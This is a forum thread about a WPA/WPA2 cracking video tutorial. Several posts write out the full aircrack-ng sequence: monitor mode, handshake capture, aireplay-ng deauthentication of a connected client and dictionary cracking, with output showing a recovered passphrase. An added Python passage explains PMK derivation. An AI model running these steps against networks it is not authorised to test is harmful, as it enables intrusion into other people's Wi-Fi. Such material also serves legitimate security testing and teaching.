
Thread: -=Xploitz=- VIDEO: Volume #3 "E-Z WPA/WPA2 Cracking Tutorial"

  1. #31
    Member | Join Date: May 2007 | Posts: 138

    I have one, whose network are you pentesting?

    As balding parrot said, if it's your network then you control the client association process...so I don't understand how your capture file has got to 89 MB.

    No offence, but there seem to be a lot of people here who are "pentesting" networks who don't seem to be that well versed in wireless pentesting...so I guess what I'm really saying is, how do you all get these jobs? Because I can't find anyone to pay me to pentest their network (not that I'd actually feel qualified to!).

    Don't take that the wrong way, I'm not accusing anyone of wrongdoing...just interested in making some spare cash.

  2. #32
    Junior Member | Join Date: Jan 2010 | Posts: 53

    Quote Originally Posted by TrialAndError:
    ...so I don't understand how your capture file has got to 89 MB...

    Do you really think I have an 89 MB capture file?
    The only statement I found in this thread about an 89 MB file is the one where Xploitz stated he doesn't have such a big one.

    I don't understand your pentest statement either.
    I just gave an example where potentially big traffic may be eliminated using ivs.

    Somehow this thread is turning in a direction it surely wasn't intended to go. I suggest further postings return to the topic. So keep up your fine tuts, Xploitz!

  3. #33
    Senior Member | Join Date: Apr 2007 | Posts: 3,385

    I can understand where you're coming from, thetom. If someone hired me to pentest their network, I'm sure there's the type of people out there that insist on it being done without their knowing of it happening. I for one would be such an individual. I wouldn't want to know when it was happening ONLY because I wouldn't want to be tempted to try to beef up my security before the test..and then I'd get a chance to see how good the pentester and my security really is/was.

    But as far as days' worth of data that doesn't contain a handshake?? Maybe the owner forgot their key and can't connect themselves..lol..and doesn't know about the reset button on the AP/router?? (lol) Maybe then the owner of the AP would need to know the date of your pentest..so the situation of days' worth of no-handshake data wouldn't occur...I know a certain person that didn't know about the reset button..and it didn't help out with my laughter after finding out it was a woman...and yes,..lol..she was a blonde..lol
    --=Xploitz=-- ®
    Remote-Exploit.orgs Master Tutorialist.™
    VIDEO: Volume #1 "E-Z No Client WEP Cracking Tutorial" (http://forums.remote-exploit.org/showthread.php?t=9063)
    VIDEO: Volume #2 "E-Z No Client Korek Chopchop Attack Tutorial" (http://forums.remote-exploit.org/showthread.php?t=7872)
    VIDEO: Volume #3 "E-Z WPA/WPA2 Cracking Tutorial" (http://forums.remote-exploit.org/showthread.php?t=8230)
    VIDEO: Volume #4 "E-Z Cracking WPA/WPA2 With Airolib-ng Databases" (http://forums.remote-exploit.org/showthread.php?t=8041)

  4. #34
    Junior Member | Join Date: Jan 2010 | Posts: 53

    Right you are. A correct pentest has to be done under real circumstances, except for those that might break vital services.

    In my opinion there has now been enough said about handshake capturing.

    About people not knowing the "reset" button, I have some words to tell.
    A friend of mine asked me to support him with his WLAN problems.
    Via phone I asked him at first to restart his router and explained how to do this. After the restart his notebook got a connection at once. A big yell in my ear showed his happiness, especially with this "magic" solution. So I asked how long he had had problems. He answered four weeks.
    I was a little amused and shocked at the same time. Can anybody here imagine being four weeks offline because of not hitting the restart button?

    @edit: as usual, some typos. I guess most have already found out I'm not a native English speaker.

  5. #35
    Senior Member | Join Date: Apr 2007 | Posts: 3,385

    This is gonna make me look very "no0bish". But remember,..this was my very first time with anything outside my direct connection with a wired PC. I never had anyone tell me this stuff and I had just bought my first laptop..and thought that because I got a wireless laptop..I got an automatic free internet connection. Seems that a lot of people think that just because they buy a wireless laptop..they get free internet access anywhere in the world via a free satellite or something..I know I did..lol

    I went 4 hours without connection the very first time I bought a wireless router. I couldn't decide what type of encryption to put on it. I kept going from WEP to WPA2..back and forth..then I read I needed a strong password...so I made up something like....xploitzconn3cti0n 1014 t3st. And guess what....I forgot what it was..and I couldn't even remember the password to my router's web page that I changed from admin to something else. Then I read the instruction book..and it spoke of this "magic" reset button...and all my problems went away. True story.

  6. #36
    Yes, it works

    *** I take no credit for this, I am just posting how I managed to crack my WPA thanks to Xploitz' video ***
    After watching Xploitz' video, I just had to try this for myself. Now admittedly I didn't get it the first time, so I watched it over & over carefully & used the following commands:

    airmon-ng stop ath0

    airmon-ng start wifi0

    airodump-ng ath0    <<<<----- this will give you a list of networks *** Ctrl+C to stop dumping & type the next command ***

    airodump-ng -c 11 -w psk --bssid XX:XX:XX:XX:XX:XX ath0

    new shell <------

    aireplay-ng -0 1 -a XX:XX:XX:XX:XX:XX -c <A CLIENT'S MAC ADDRESS THAT'S ALREADY CONNECTED TO THE NETWORK!> ath0

    Get your handshake...then Ctrl+C to break out of airodump...
    aircrack-ng -w <dictionary name if in home folder..else the path to your dictionary.> psk*.cap

    I have 2 say this with GREAT gratitude..... you ARE "Moderator and Remote-Exploit.orgs Master Tutorialist".
    BECAUSE of YOU - I have managed to CRACK my router on WPA-PSK.

    This worked for me WITHOUT FAIL 3 times.
    I had a very weak passphrase "password" just to see how / if it would work & voilà, it does, so now I know how to do this & how easy it was, I'll be going Lockdown so nobody can try to crack me.

    Again & as always, many thanks to Xploitz for his brilliant video.

  7. #37
    results

    OK, I ran this again just now - yesterday I had a really simple passphrase "password" - this cracked it in 00:00:00 seconds with aircrack-ng's built-in password.lst. However, I didn't notice "password" listed when I did cat password.lst mmmm - anyways, I downloaded a small 7 MB password list & put a different passphrase "security" (which is also a simple passphrase) on my router & it took a little longer, but nonetheless cracked it, following Xploitz' video - so I'll need to get my head around this & try to get BT2 installed on my HDD & then & only then, look into trying Xploitz' 4th video

    "HOW TO USE AIROLIB-NG WITH AIRCRACK-NG"

    Below are the results of my WPA crack:

    [00:13:20] 129346 keys tested (160.11 k/s)


    KEY FOUND! [ security ]


    Master Key : 99 00 C3 EA 17 FA 69 F2 90 9B 88 D5 DA 98 3D D2
    8B 58 8C 41 A9 DB F8 CD 7F 6F A8 D0 D7 82 D4 3F

    Transcient Key : 64 2F 11 84 F0 62 2D FF D7 A6 F8 23 08 85 F6 0B
    13 03 35 15 2A D8 68 4E 73 33 27 2B D3 88 AD 54
    2D A1 A3 E0 0F D4 64 71 8C 67 A6 AE BF D6 3C 36
    86 84 C5 82 FD FE 6D 38 46 66 8F 2F 12 0B 13 AE

    EAPOL HMAC : EF A6 53 B0 68 5B 0C 38 FC E0 E4 87 E4 1E EB 96

    bt ~ #

  8. #38
    Senior Member | Join Date: Apr 2007 | Posts: 3,385

    Quote Originally Posted by samsung:
    *** I take no credit for this, I am just posting how I managed to crack my WPA thanks to Xploitz' video ***
    After watching Xploitz' video, I just had to try this for myself. Now admittedly I didn't get it the first time, so I watched it over & over carefully & used the following commands:

    airmon-ng stop ath0

    airmon-ng start wifi0

    airodump-ng ath0    <<<<----- this will give you a list of networks *** Ctrl+C to stop dumping & type the next command ***

    airodump-ng -c 11 -w psk --bssid XX:XX:XX:XX:XX:XX ath0

    new shell <------

    aireplay-ng -0 1 -a XX:XX:XX:XX:XX:XX -c <A CLIENT'S MAC ADDRESS THAT'S ALREADY CONNECTED TO THE NETWORK!> ath0

    Get your handshake...then Ctrl+C to break out of airodump...
    aircrack-ng -w <dictionary name if in home folder..else the path to your dictionary.> psk*.cap

    I have 2 say this with GREAT gratitude..... you ARE "Moderator and Remote-Exploit.orgs Master Tutorialist".
    BECAUSE of YOU - I have managed to CRACK my router on WPA-PSK.

    This worked for me WITHOUT FAIL 3 times.
    I had a very weak passphrase "password" just to see how / if it would work & voilà, it does, so now I know how to do this & how easy it was, I'll be going Lockdown so nobody can try to crack me.

    Again & as always, many thanks to Xploitz for his brilliant video.

    You are 2 kind. I do try to live up to my signature. Have you transcribed all of my videos that you watched?? I might just make you my "Video Security Transcriptionist".


    Quote Originally Posted by samsung:
    OK, I ran this again just now - yesterday I had a really simple passphrase "password" - this cracked it in 00:00:00 seconds with aircrack-ng's built-in password.lst. However, I didn't notice "password" listed when I did cat password.lst mmmm - anyways, I downloaded a small 7 MB password list & put a different passphrase "security" (which is also a simple passphrase) on my router & it took a little longer, but nonetheless cracked it, following Xploitz' video - so I'll need to get my head around this & try to get BT2 installed on my HDD & then & only then, look into trying Xploitz' 4th video

    "HOW TO USE AIROLIB-NG WITH AIRCRACK-NG"

    Below are the results of my WPA crack:

    [00:13:20] 129346 keys tested (160.11 k/s)


    KEY FOUND! [ security ]

    Just imagine it saying this....

    [00::02] 129346 keys tested (55,000 k/s)

    That's what airolib and aircrack can accomplish TOGETHER. Remember to pay VERY STRICT ATTENTION to that airolib video. It's a tricky one.

    You're going to basically use up SOME time making the databases...but only HALF as long........ VS using aircrack-ng as a stand-alone. Say it takes you 60 minutes to go through a dictionary attack with aircrack-ng..

    aircrack-ng -w wordlist.lst psk*.cap

    it would take you only about 30-35 minutes to generate a pre-computed hash table with airolib with all of those passwords..but you have them salted with your ESSID as the kicker...and you can add ESSIDs to that with just a little bit extra time 'cause the database is already precomputed. Ask Shamanvirtuel....it's really the way to go if you use large dictionaries regularly.
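    The "salted with your ESSID" remark above is the whole story of why airolib-ng tables are per-network: WPA/WPA2-PSK turns the passphrase into the 256-bit pairwise master key (the "Master Key" line in aircrack-ng output) with PBKDF2-HMAC-SHA1, 4096 iterations, using the ESSID as salt. The Python below is an added example, not code from this thread or from the aircrack-ng project; it derives the PMK, checks it against the published IEEE 802.11i test vector (passphrase "password", SSID "IEEE"), and shows that the same weak passphrase gives unrelated PMKs under two constructed ESSIDs ("homenet-a", "homenet-b" are made-up names), so the only thing a network owner controls is how many candidates an attacker must push through that fixed 8192-HMAC cost.

```python
import hashlib

# Constants fixed by IEEE 802.11i for the passphrase-to-PSK mapping.
PBKDF2_ITERATIONS = 4096
PMK_LEN = 32  # 256-bit PMK; aircrack-ng prints it as "Master Key"

# Published test vector (IEEE 802.11i Annex H): passphrase "password", SSID "IEEE".
IEEE_TEST_VECTOR_PMK = "f42c6fc52df0ebef9ebb4b90b38a5f902e83fe1b135a70e23aed762e9710a12e"


def derive_pmk(passphrase: str, essid: str) -> bytes:
    """PBKDF2-HMAC-SHA1 over the passphrase with the ESSID as salt.

    The ESSID salt binds any precomputed table (airolib-ng) to the network
    names it was built for; the fixed iteration count makes every guess cost
    the same, so passphrase entropy is the owner's only lever.
    """
    pw = passphrase.encode("ascii")
    if not 8 <= len(pw) <= 63 or not all(32 <= b <= 126 for b in pw):
        raise ValueError("passphrase must be 8..63 printable ASCII characters")
    salt = essid.encode("utf-8")
    if not 0 < len(salt) <= 32:
        raise ValueError("ESSID must be 1..32 bytes")
    return hashlib.pbkdf2_hmac("sha1", pw, salt, PBKDF2_ITERATIONS, PMK_LEN)


def hmac_calls_per_candidate() -> int:
    """HMAC-SHA1 invocations per guess: SHA-1 gives 20 bytes, so a 32-byte PMK
    needs two PBKDF2 output blocks of 4096 iterations each (8192 total)."""
    blocks = -(-PMK_LEN // hashlib.sha1().digest_size)  # ceil(32 / 20) == 2
    return blocks * PBKDF2_ITERATIONS


def same_passphrase_other_essid(passphrase: str, essid_a: str, essid_b: str) -> bool:
    """True when one passphrase yields distinct PMKs under two ESSIDs, i.e. a
    table built for essid_a cannot be reused against a network named essid_b."""
    return derive_pmk(passphrase, essid_a) != derive_pmk(passphrase, essid_b)


def master_key_line(passphrase: str, essid: str) -> str:
    """The PMK in the spaced upper-case hex layout of aircrack-ng's Master Key line."""
    return " ".join(f"{b:02X}" for b in derive_pmk(passphrase, essid))


if __name__ == "__main__":
    # Constructed example, not an observed network: the thread's weak passphrase
    # "security" under two hypothetical router names.
    print("spec vector ok   :", derive_pmk("password", "IEEE").hex() == IEEE_TEST_VECTOR_PMK)
    print("HMAC per guess   :", hmac_calls_per_candidate())
    print("ESSID changes PMK:", same_passphrase_other_essid("security", "homenet-a", "homenet-b"))
    print("Master Key       :", master_key_line("security", "homenet-a"))
```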

  9. #39
    Junior Member | Join Date: Jun 2007 | Posts: 29
    [TKIP+PSK] no WPA Handshake

    Hi,
    I followed the video by Xploitz:
    -=Xploitz=- VIDEO: #3 "E-Z WPA/WPA2 Cracking Tutorial"
    -XploitxVideoE-ZWPAWPA2CrackingTuto.flv

    I have 1 station connected
    and ENC: WPA
    CIPHER: TKIP
    AUTH: PSK
    ESSID: [name]

    I do:
        aireplay-ng -0 1 -a <BSSID AP> -c <BSSID CLIENT> wlan0
    It writes:
        Waiting for beacon frame (BSSID AP)
        Sending DeAuth to station -- STMAC [BSSID CLIENT]
    But I have no "WPA handshake" written in the airodump-ng shell.

    I don't know why.

    This:
        aircrack-ng -w pass psk*.cap
    gives an encryption: EAPOL+WEP (445 IVs)

    Thanks

  10. #40
    Senior Member | Join Date: Apr 2007 | Posts: 3,385

    Moving this post to my videos thread because I asked in that thread that if you had any questions to please post them there.

    First off...please list ALL of your commands EXACTLY from startup please. It's very important. And if you followed my video and used the same commands that I used...still take the time to post EVERY COMMAND YOU WROTE. Also what card and chipset are you using?? The number of IVs is pointless, since it's NOT WEP..so ignore their values. Usually when you fail to get a handshake..it's 'cause you're not associated/authenticated..channel hopping..or just 2 far away. Remember..you're trying to crack WPA/WPA2..not WEP. In WEP you only need to be close to the router / AP..but in cracking WPA/WPA2...you have to be close to BOTH client and AP/router. Hope this helps..and if not ...please post all info that I requested from you.
